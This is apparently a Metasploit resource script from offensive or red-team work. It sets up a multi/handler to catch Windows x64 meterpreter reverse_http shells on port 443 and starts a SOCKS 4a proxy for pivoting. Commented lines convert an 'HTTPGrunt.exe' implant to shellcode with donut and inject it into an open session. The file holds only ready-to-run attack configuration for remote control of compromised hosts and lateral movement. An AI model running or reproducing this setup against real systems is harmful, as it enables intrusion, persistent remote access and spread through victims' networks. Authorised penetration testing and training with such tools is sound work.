#msfconsole -r pivot.rc -q

#SESSION PASS
spool msf.log
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST tun0
set LPORT 443
set EXITFUNC thread
set EXITONSESSION false
exploit -j


#SOCKS
use auxiliary/server/socks_proxy
set VERSION 4a
exploit -j


#INJECT
#C:\payloads> C:\tools\donut\donut.exe HTTPGrunt.exe -e1 -a2 -b1 -f1 -x1 -o HTTPGrunt.bin
#use post/windows/manage/shellcode_inject
#sessions
#set SESSION 1
#set SHELLCODE /tmp/HTTPGrunt.bin
#run
